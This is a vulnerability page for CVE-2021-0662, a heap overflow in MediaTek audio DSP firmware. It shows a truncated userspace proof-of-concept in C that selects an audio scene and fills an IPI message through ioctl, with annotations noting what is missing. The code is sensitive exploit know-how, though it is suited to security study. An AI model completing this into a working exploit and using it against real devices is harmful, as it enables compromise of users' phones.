CVE-2021-0662
Information
A classic heap overflow in the init_share_mem_core function of the MediaTek audio DSP
firmware, reached from userspace through the audio IPI ioctl interface that the PoC below drives.
PoC (userspace side, excerpt only — the listing below stops before the ioctl that submits the message: AUDIO_IPI_SEND_PAYLOAD is defined but never used in what is shown, the function's closing brace is missing, and ipi_msg_t / MAX_IPI_MSG_PAYLOAD_SIZE come from headers not reproduced here):
/* ioctl request numbers for the audio IPI device.  Under the generic/ARM
 * Linux _IOC encoding both decode as dir=_IOC_WRITE, size=4, type='i':
 *   0x40046901 == _IOW('i', 1,  <4-byte arg>)
 *   0x4004690A == _IOW('i', 10, <4-byte arg>)
 * The 4-byte argument size matches LOAD_SCENE being called below with the
 * scene id passed by value; what the driver expects for SEND_PAYLOAD is not
 * shown in this excerpt (the macro is defined but never used here). */
#define AUDIO_IPI_SEND_PAYLOAD 0x40046901
#define AUDIO_IPI_LOAD_SCENE 0x4004690A
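/*
 * Build an audio IPI message carrying an inline payload for the DSP.
 *
 * Selects the task scene with AUDIO_IPI_LOAD_SCENE, then fills an ipi_msg_t
 * with the caller's ids/params and copies param1 bytes of data_buffer into
 * the message's inline payload.
 *
 * NOTE(review): the listing is truncated in the source page -- the call that
 * submits ipi_msg (presumably the AUDIO_IPI_SEND_PAYLOAD ioctl defined above,
 * which is otherwise unused) and the function's return/closing brace are not
 * shown.  The definition of ipi_msg_t and the value of MAX_IPI_MSG_PAYLOAD_SIZE
 * are also not part of this excerpt.  The original used `ipi_msg->` on a
 * struct declared by value; that is corrected to `ipi_msg.` here.
 *
 * drv          fd of the audio IPI device
 * task_scene   scene id selected via AUDIO_IPI_LOAD_SCENE and echoed in the msg
 * msg_id       copied into ipi_msg.msg_id
 * param1       doubles as the payload length (bytes copied from data_buffer)
 * param2       passed through unchanged in ipi_msg.param2
 * data_buffer  source of the payload bytes; must hold at least param1 bytes
 *
 * Returns -1 if LOAD_SCENE fails or param1 exceeds MAX_IPI_MSG_PAYLOAD_SIZE
 * (diagnostic printed to stdout); the success path is cut off in this excerpt.
 */
int send_ipi_payload(
    int32_t drv, uint8_t task_scene, uint16_t msg_id,
    uint32_t param1, uint32_t param2, void* data_buffer) {
    // Scene id goes to ioctl by value (promoted to int), not by pointer; this
    // matches the 4-byte argument size encoded in AUDIO_IPI_LOAD_SCENE.
    int ret = ioctl(drv, AUDIO_IPI_LOAD_SCENE, task_scene);
    if (ret != 0) {
        fprintf(stdout, "[-] ioctl AUDIO_IPI_LOAD_SCENE fail! ret = %d\n", ret);
        return -1;
    }

    ipi_msg_t ipi_msg;
    ipi_msg.magic = 0x8888;
    ipi_msg.task_scene = task_scene;
    ipi_msg.source = 0;     // from HAL
    ipi_msg.target = 2;     // to DSP
    ipi_msg.data_type = 1;  // inline payload, don't use DMA
    ipi_msg.ack_type = 0;   // no ack
    ipi_msg.msg_id = msg_id;
    ipi_msg.param1 = param1;
    ipi_msg.param2 = param2;

    // Client-side guard only: it keeps the memcpy below inside ipi_msg.payload
    // (assuming payload is MAX_IPI_MSG_PAYLOAD_SIZE bytes -- its declaration
    // is not visible here).  It says nothing about how the DSP firmware bounds
    // param1 once the message arrives; per the description above, the CVE's
    // overflow lives on that firmware side, not in this userspace check.
    if (ipi_msg.param1 > MAX_IPI_MSG_PAYLOAD_SIZE) {
        fprintf(stdout, "[-] payload size %u error\n", ipi_msg.param1);
        return -1;
    }
    memcpy(ipi_msg.payload, data_buffer, ipi_msg.param1);
    // NOTE(review): excerpt ends here in the source page; the ioctl that
    // submits ipi_msg and the function's return/closing brace are missing.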
References:
https://corp.mediatek.com/product-security-bulletin/October-2021
https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp